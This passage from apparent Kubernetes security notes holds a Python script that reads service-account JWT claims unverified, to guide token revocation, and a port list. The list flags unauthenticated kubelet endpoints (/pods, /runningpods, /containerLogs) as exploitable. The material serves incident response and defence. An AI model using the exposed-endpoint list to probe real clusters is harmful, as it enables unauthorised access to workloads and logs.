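    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment.encode()).decode()


def _b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def make_constructed_token(payload):
    """Build a syntactically valid but UNSIGNED token so the example runs
    offline. The signature segment is a dummy; this is not a usable credential."""
    header = json.dumps({"alg": "RS256", "typ": "JWT"}, separators=(",", ":"))
    body = json.dumps(payload, separators=(",", ":"))
    return ".".join([_b64url_encode(header.encode()),
                     _b64url_encode(body.encode()),
                     _b64url_encode(b"dummy-signature")])


LEGACY_PREFIX = "kubernetes.io/serviceaccount/"


def identify_service_account(token):
    """Read a Kubernetes service-account token's claims WITHOUT verifying it,
    to learn what it is and what revoking it means.

    Legacy (secret-backed) tokens carry kubernetes.io/serviceaccount/* claims,
    no 'exp', and are revoked by deleting the named Secret. Bound tokens carry
    a 'kubernetes.io' object and an 'exp', and die with the pod or on expiry.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT: expected three dot-separated segments")
    claims = json.loads(_b64url_decode(parts[1]))

    if LEGACY_PREFIX + "service-account.name" in claims:
        return {
            "kind": "legacy-secret",
            "namespace": claims.get(LEGACY_PREFIX + "namespace"),
            "service_account": claims[LEGACY_PREFIX + "service-account.name"],
            "secret": claims.get(LEGACY_PREFIX + "secret.name"),
            "pod": None,
            "expires": None,  # legacy tokens have no expiry
        }
    bound = claims.get("kubernetes.io", {})
    return {
        "kind": "bound",
        "namespace": bound.get("namespace"),
        "service_account": bound.get("serviceaccount", {}).get("name"),
        "secret": None,
        "pod": bound.get("pod", {}).get("name"),
        "expires": claims.get("exp"),
    }


# Constructed sample tokens (claim names are the real ones; values are made up,
# the secret name is borrowed from the page's kube-dns pod spec).
LEGACY_TOKEN = make_constructed_token({
    "iss": "kubernetes/serviceaccount",
    LEGACY_PREFIX + "namespace": "kube-system",
    LEGACY_PREFIX + "secret.name": "kube-dns-token-xznw5",
    LEGACY_PREFIX + "service-account.name": "kube-dns",
    LEGACY_PREFIX + "service-account.uid": "00000000-0000-0000-0000-000000000000",
    "sub": "system:serviceaccount:kube-system:kube-dns",
})
BOUND_TOKEN = make_constructed_token({
    "iss": "https://kubernetes.default.svc",
    "sub": "system:serviceaccount:default:web",
    "exp": 1700000000,
    "kubernetes.io": {"namespace": "default",
                      "serviceaccount": {"name": "web"},
                      "pod": {"name": "web-5d4c-abcde"}},
})

if __name__ == "__main__":
    for tok in (LEGACY_TOKEN, BOUND_TOKEN):
        print(tok[:19] + "...", identify_service_account(tok))
```

Both constructed tokens start with the same eyJhbGciOiJSUzI1NiI prefix the post shows, because that prefix is just the base64 of an RS256 JWT header. A "legacy-secret" result means rotation is `kubectl delete secret <secret> -n <namespace>` (the controller re-creates it on older clusters) plus a review of what that service account's RBAC allowed; a "bound" result means the exposure window is bounded by the pod's life and the `exp` claim.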

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html

Kubernetes: List of ports

Other Kubernetes ports

What are some of the visible ports used in Kubernetes?

44134/tcp - Helm tiller, weave, calico
10250/tcp - kubelet (kublet exploit)
    No authN, completely open
    /pods
    /runningpods
    /containerLogs
10255/tcp - kublet port (read-only)
    /stats
    /metrics
    /pods
4194/tcp - cAdvisor
2379/tcp - etcd (see it on other ports though)
    Etcd holds all the configs
    Config storage
30000 - dashboard
443/6443 - api

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-list-of-ports.html